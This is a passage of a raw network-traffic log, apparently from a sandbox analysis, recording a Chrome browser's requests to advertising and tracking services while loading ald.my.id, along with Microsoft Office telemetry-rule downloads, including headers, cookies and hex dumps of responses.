                                                                                                                                                                                                                                                                                                                                                                          Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2542884292174911&output=html&h=250&slotname=3704632056&adk=1080356790&adf=1713894358&pi=t.ma~as.3704632056&w=300&abgtt=3&lmt=1728897154&format=300x250&url=https%3A%2F%2Fald.my.id%2F&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzQiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTM0Il0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzQiXV0sMF0.&dt=1728897152711&bpp=36&bdt=1799&idt=1960&shv=r20241009&mjsv=m202410080101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=243x600&correlator=2303771533125&frm=20&pv=1&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=525&ady=100&biw=1280&bih=907&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759842%2C95338737%2C44798934%2C95343454%2C95344778&oid=2&pvsid=3856392468538169&tmod=1611993855&uas=0&nvt=2&ref=https%3A%2F%2Fald.my.id%2F&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C% [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: test_cookie=CheckForPermission
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC1541INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                          P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                                                                                                                                                                                                          Location: https://www.googleadservices.com/pagead/ar-adview/?nrh={"aggregation_keys":{"1":"0xcd69434bb43f03c90000000000000000","2":"0x5267a537231be17d0000000000000000","3":"0x835de52adf90f2310000000000000000","4":"0x5968964027f738070000000000000000","5":"0xdcbef11b653653640000000000000000"},"debug_key":"13704419203483141118","debug_reporting":true,"destination":"https://managedmethods.com","event_report_window":"259200","expiry":"2592000","filter_data":{"2":["1023206053"],"22":["true"],"4":["10-14"],"6":["true"]},"priority":"500","source_event_id":"12192105714142319841"}&andc=true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: cafe
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: IDE=AHWqTUk0zOnp7KPAX2H7PV04lK3EUODRxZQzvzNUj9mqfajXpAGNwRNeTOLJeNEyKAk; expires=Wed, 14-Oct-2026 09:12:38 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: test_cookie=; expires=Fri, 01-Aug-2008 22:45:55 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          76192.168.2.74982435.244.174.684432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC681OUTGET /1000.gif?memo=CP6JFhoNCIXBs7gGEgUI6AcQAEIASgA HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: rc.rlcdn.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: rlas3=Br7g69ymsr9T4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=; pxrc=CAA=
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC751INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                                                                          Location: https://pippio.com/api/sync?pid=5324&it=1&iv=bb223ec720efd1a5bfb42707226896385053ef0e7abb66ab4369801d74f64181791426b5417dce21&_=2
                                                                                                                                                                                                                                                                                                                                                                          P3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: rlas3=cFd4eRXc6kRT4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=; Path=/; Domain=rlcdn.com; Expires=Tue, 14 Oct 2025 09:12:38 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: pxrc=CIbBs7gGEgUI6AcQABIFCOhHEAA=; Path=/; Domain=rlcdn.com; Expires=Fri, 13 Dec 2024 09:12:38 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          77192.168.2.749825107.178.254.654432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC584OUTGET /api/sync?pid=5324&_=2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: pippio.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC795INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          cache-control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                                                                          content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          p3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: did=tFq1X5sQFdt_tbrT; Path=/; Domain=pippio.com; Expires=Tue, 14 Oct 2025 09:12:38 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: didts=1728897158; Path=/; Domain=pippio.com; Expires=Tue, 14 Oct 2025 09:12:38 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: nnls=; Path=/; Domain=pippio.com; Expires=Fri, 13 Dec 2024 09:12:38 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: pxrc=CAA=; Path=/; Domain=pippio.com; Expires=Fri, 13 Dec 2024 09:12:38 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          78192.168.2.74982365.9.66.1044432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC543OUTGET /lt/c/16311/sync.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: tags.crwdcntrl.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://cdn-tc.33across.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC559INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 43601
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 20 Aug 2024 18:43:24 GMT
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:40 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                                                                                                          ETag: "9b991fc4e41448221be02744748ec589"
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 6165dcc1fdf84ac65e8204c05709f1ca.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA56-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: Oy8fGQ4EGnR5qnZyEAd9IQO4pAn8V0dsKPfLbDhGcKPQkOx06Vkymg==
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC16384INData Raw: 76 61 72 20 6c 6f 74 61 6d 65 49 73 43 6f 6d 70 61 74 69 62 6c 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 72 65 74 75 72 6e 20 28 20 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 6b 65 79 73 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 70 6f 73 74 4d 65 73 73 61 67 65 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 28 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 2e 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 29 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 20 21 3d 3d 20 27
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: var lotameIsCompatible = function() { return ( typeof Object.keys !== 'undefined' && typeof window.postMessage !== 'undefined' && typeof XMLHttpRequest !== 'undefined' && typeof(new XMLHttpRequest().withCredentials) !== 'undefined' && typeof console !== '
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC16384INData Raw: 28 62 3d 21 31 2c 73 79 6e 63 31 36 33 31 31 5f 2e 65 72 72 6f 72 28 22 74 61 67 49 6e 70 75 74 2e 64 61 74 61 2e 74 68 69 72 64 50 61 72 74 79 20 73 68 6f 75 6c 64 20 62 65 20 61 6e 20 6f 62 6a 65 63 74 22 29 29 3b 61 2e 6e 61 6d 65 73 70 61 63 65 7c 7c 28 62 3d 21 31 2c 73 79 6e 63 31 36 33 31 31 5f 2e 65 72 72 6f 72 28 22 74 61 67 49 6e 70 75 74 2e 64 61 74 61 2e 74 68 69 72 64 50 61 72 74 79 2e 6e 61 6d 65 73 70 61 63 65 20 69 73 20 6e 6f 74 20 64 65 66 69 6e 65 64 22 29 29 3b 61 2e 76 61 6c 75 65 7c 7c 28 62 3d 21 31 2c 73 79 6e 63 31 36 33 31 31 5f 2e 65 72 72 6f 72 28 22 74 61 67 49 6e 70 75 74 2e 64 61 74 61 2e 74 68 69 72 64 50 61 72 74 79 2e 76 61 6c 75 65 20 69 73 20 6e 6f 74 20 64 65 66 69 6e 65 64 22 29 29 3b 61 2e 6e 61 6d 65 73 70 61 63 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: (b=!1,sync16311_.error("tagInput.data.thirdParty should be an object"));a.namespace||(b=!1,sync16311_.error("tagInput.data.thirdParty.namespace is not defined"));a.value||(b=!1,sync16311_.error("tagInput.data.thirdParty.value is not defined"));a.namespace
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC10833INData Raw: 2b 63 29 7d 72 65 74 75 72 6e 21 31 7d 20 66 75 6e 63 74 69 6f 6e 20 73 79 6e 63 31 36 33 31 31 5f 4d 61 28 61 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 5f 5f 6c 6f 74 61 6d 65 49 66 72 61 6d 65 54 63 66 41 70 69 26 26 28 73 79 6e 63 31 36 33 31 31 5f 2e 64 65 62 75 67 28 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 20 54 43 46 20 73 75 70 70 6f 72 74 20 69 6e 20 61 6e 20 69 66 72 61 6d 65 22 29 2c 77 69 6e 64 6f 77 2e 5f 5f 6c 6f 74 61 6d 65 49 66 72 61 6d 65 54 63 66 41 70 69 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 2c 66 29 7b 76 61 72 20 68 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 22 22 3b 62 3d 7b 5f 5f 74 63 66 61 70 69 43 61 6c 6c 3a 7b 63 6f 6d 6d 61 6e 64 3a 62 2c 70 61 72 61 6d 65 74 65 72 3a 66
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: +c)}return!1} function sync16311_Ma(a){"undefined"===typeof window.__lotameIframeTcfApi&&(sync16311_.debug("Initializing TCF support in an iframe"),window.__lotameIframeTcfApi=function(b,c,d,f){var h=Math.random()+"";b={__tcfapiCall:{command:b,parameter:f


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          79192.168.2.74980635.156.11.1554432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC531OUTGET /pd/dtscout?_t_=px&url=https%3A%2F%2Fald.my.id%2F&event_source=dtscout&rnd=0.9666548919402609&exptid=ZHoAA2cM4IQAAAAICdw7Aw%3D%3D&fcmp=false HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: pd.sharethis.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: __stid=ZHoAA2cM4IQAAAAICdw7Aw==; __stidv=2
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC218INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains;
                                                                                                                                                                                                                                                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                                                                                                          Connection: Close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          80192.168.2.74983334.98.64.2184432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC702OUTGET /w/1.0/cm?id=e508c905-ddce-4732-92a4-0b0f5b72a28f&r=https%3A%2F%2Fidsync.rlcdn.com%2F396846.gif%3Fserved_by%3Devergreen%26partner_uid%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: us-u.openx.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC582INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                          Server: OXGW/0.0.0
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          P3P: CP="CUR ADM OUR NOR STA NID"
                                                                                                                                                                                                                                                                                                                                                                          Location: https://us-u.openx.net/w/1.0/cm?cc=1&id=e508c905-ddce-4732-92a4-0b0f5b72a28f&r=https%3A%2F%2Fidsync.rlcdn.com%2F396846.gif%3Fserved_by%3Devergreen%26partner_uid%3D
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: i=ff675d27-c17a-4d2e-b7ab-ec29a6304351|1728897158; Version=1; Expires=Tue, 14-Oct-2025 09:12:38 GMT; Max-Age=31536000; Secure; Domain=.openx.net; Path=/; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          81192.168.2.74982713.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 494
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 1507c9f1-d01e-007a-72eb-1af38c000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091238Z-17db6f7c8cfbd7pgux3k6qfa6000000004yg00000000au78
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          82192.168.2.74982813.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 420
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: a0484e99-b01e-00ab-3354-1cdafd000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
